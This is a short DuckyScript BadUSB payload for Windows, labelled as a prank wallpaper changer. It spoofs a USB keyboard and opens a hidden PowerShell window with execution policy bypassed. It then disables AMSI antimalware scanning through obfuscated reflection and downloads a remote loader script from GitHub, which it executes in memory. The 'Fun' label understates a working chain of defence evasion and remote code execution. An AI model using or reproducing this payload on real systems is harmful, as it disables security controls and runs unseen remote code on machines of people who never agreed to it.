REM ============================================================
REM 🖼️ Wallpaper Changer - Windows
REM ============================================================
REM Author: dil1thium
REM Version: 3.0 (Modular)
REM Target: Windows 10/11
REM Category: Fun
REM
REM Changes desktop wallpaper.
REM Default: Rick Astley
REM
REM OPTIONAL:
REM   Set $env:U for custom image URL
REM ============================================================
ID 1234:5678 Manufacturer:Keyboard
DELAY 500
GUI r
DELAY 400
STRING powershell -w h -ep bypass "$a=[Ref].Assembly.GetType('System.Management.Automation.Amsi'+'Utils');$f=$a.GetField('amsi'+'InitFailed','NonPublic,Static');$f.SetValue($null,$true);$env:M='wallpaper';irm https://raw.githubusercontent.com/reschjonas/FlipperZero_BadUSB/main/remote-payloads/loaders/loader.ps1|iex"
ENTER
